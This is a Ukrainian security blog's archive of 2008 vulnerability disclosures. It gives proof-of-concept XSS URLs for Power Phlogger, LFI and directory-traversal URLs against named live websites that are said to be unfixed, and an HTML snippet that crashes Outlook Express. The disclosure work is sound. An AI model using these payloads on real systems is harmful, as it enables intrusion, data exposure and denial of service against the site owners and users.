Архів для категорії 'Уразливості'

Добірка уразливостей

16:26 22.12.2008

В даній добірці уразливості в веб додатках:

Нові уразливості в Power Phlogger

23:51 20.12.2008

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. В лютому, 16.02.2008, я виявив Cross-Site Scripting і Abuse of Functionality уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

XSS:

Це reflected і persistent XSS.

http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код в подальшому виконується при відвіданні сторінок http://site/edUserprofile.php і http://site/edCss.php.

Abuse of Functionality:

Якщо відправити запит (зокрема через CSRF атаку на залогіненого користувача) з action=create+new і з вказанням fields[css], без вказання fields[userid] поточного користувача, то нова CSS запишеться в системі як дефолтна і користувач не зможе її видалити. Чим можна засмітити БД системи.

http://site/edCss.php?action=create+new&fields%5Bcss%5D=1

Дану уразливість також можна використати, щоб провести вищенаведену persistent XSS атаку не тільки в рамках одного акаунта, а в рамках всіх акаунтів системи.

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це сьома частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Уразливості на www.iacc-ev.eu

18:27 20.12.2008

09.06.2008

У жовтні, 26.10.2007, я знайшов Local File Inclusion та Directory Traversal уразливості на проекті http://www.iacc-ev.eu. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

20.12.2008

Local File Inclusion та Directory Traversal:

http://www.iacc-ev.eu/html/autohtml.php?filename=../file.php
http://www.iacc-ev.eu/html/autohtml.php?filename=../robots.txt

Дані уразливості досі не виправлені.

Уразливості на aukcion.ua та auction.ua

23:53 19.12.2008

У лютому, 02.02.2008, я знайшов Cross-Site Scripting уразливості на сайті http://aukcion.ua (інтернет аукціон). Який є іншим доменом http://auction.ua. На якому знайдені дірки також мають місце.

Раніше я вже писав про уразливість на auction.ua. Минулого разу адміністрація проекту дуже несерйозно віднеслася до проблем з безпекою на сайті. Що добре видно по новим уразливостям.

XSS (IE):

http://aukcion.ua

http://auction.ua

Добірка уразливостей

15:26 19.12.2008

В даній добірці уразливості в веб додатках:

  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • PHP remote file inclusion vulnerability in Scorp Book 1.0 (деталі)
  • Cross-site scripting (XSS) vulnerability in Pineapple Technologies QuizShock (деталі)
  • IBM DB2 DB2JDS Multiple Vulnerabilities (деталі)
  • Multiple xss in mambo 4.6.2 (деталі)
  • PHP Security Framework: Vuln and Security Bypass (деталі)
  • Uber Uploader <= 5.3.6 Remote File Upload Vulnerability (деталі)
  • SurgeMail v.38k4 webmail Host header crash (деталі)
  • neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss) (деталі)
  • xeCMS 1.x.x Remote File Disclosure Vulnerability (деталі)

Уразливості на www.metacafe.com

19:22 18.12.2008

11.06.2008

У жовтні, 26.10.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting уразливості на популярному проекті http://www.metacafe.com (відео хостінг). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.12.2008

XSS:

Перша уразливість вже виправлена, але друга досі не виправлена.

Новий DoS в Microsoft Outlook

23:55 17.12.2008

У вересні, 16.09.2008, я виявив нову Denial of Service уразливість в Microsoft Outlook. Раніше я вже писав про DoS в Microsoft Outlook.

Уразливість знаходиться в бібліотеці mshtml.dll. Дана уразливість ідентична DoS в Outlook Express, про яку я писав учора.

Експлоіт:

Для атаки потрібно надіслати html-лист на емайл користувача Outlook, що містить в тілі спеціальний код. Експлоіт такий самий, як і для Outlook Express.

DoS exploit

При перегляді цього листа поштовий клієнт виб’є.

Вразлива версія Outlook 2002 (SP-2) та попередні версії (2002 до SP-2 та вірогідно 2000 та попередні). Версії 2003 і 2007 під Windows XP також можуть бути вразливі (Outlook 2007 під Windows Vista не вразливий).

Добірка уразливостей

16:27 17.12.2008

В даній добірці уразливості в веб додатках:

  • Upload directory traversal in Easy File Sharing 4.5 (деталі)
  • Request It: Song Request System 1.0b - remote file inclusion (деталі)
  • Gsylvain35 Portail Web Remote File Include Vulnerabilities (деталі)
  • phpMyAdmin 2.6.1 Local Cross Site Scripting (деталі)
  • Remot File Include In Script Lore v1 (деталі)
  • Take Control In Script Jeebles Directory (деталі)
  • UBB.threads (<= 6.1.1) SQL Injection Vulnerability (деталі)
  • Borland InterBase Multiple Buffer Overflow Vulnerabilities (деталі)
  • Firebird Relational Database Multiple Buffer Overflow Vulnerabilities (деталі)
  • Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 (деталі)

Новий DoS в Microsoft Outlook Express

23:53 16.12.2008

У вересні, 16.09.2008, я виявив нову Denial of Service уразливість в Microsoft Outlook Express (для Windows XP). Раніше я вже писав про DoS в Microsoft Outlook Express.

Уразливість знаходиться в бібліотеці mshtml.dll.

Експлоіт:

Потрібно надіслати html-лист на емайл користувача Outlook Express, що містить в тілі наступний код.
<dt><h1 style=width:1px><li></h1>
DoS exploit

При перегляді цього листа поштовий клієнт виб’є.

Вразлива версія Outlook Express 6.00.2900.2180 та попередні версії. Windows Mail для Windows Vista не вразливий.

Уразливості на www.fvpadula.it

19:28 16.12.2008

30.05.2008

У жовтні, 26.10.2007, я знайшов Full path disclosure, Local File Inclusion та Directory Traversal уразливості на проекті http://www.fvpadula.it. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.12.2008

Full path disclosure:

http://www.fvpadula.it/news/autohtml.php?op=modload&name=1.html&file=index

Local File Inclusion та Directory Traversal:

http://www.fvpadula.it/news/autohtml.php?op=modload&name=../robots.txt&file=index
http://www.fvpadula.it/news/autohtml.php?op=modload&name=../file.php&file=index

Дані уразливості досі не виправлені.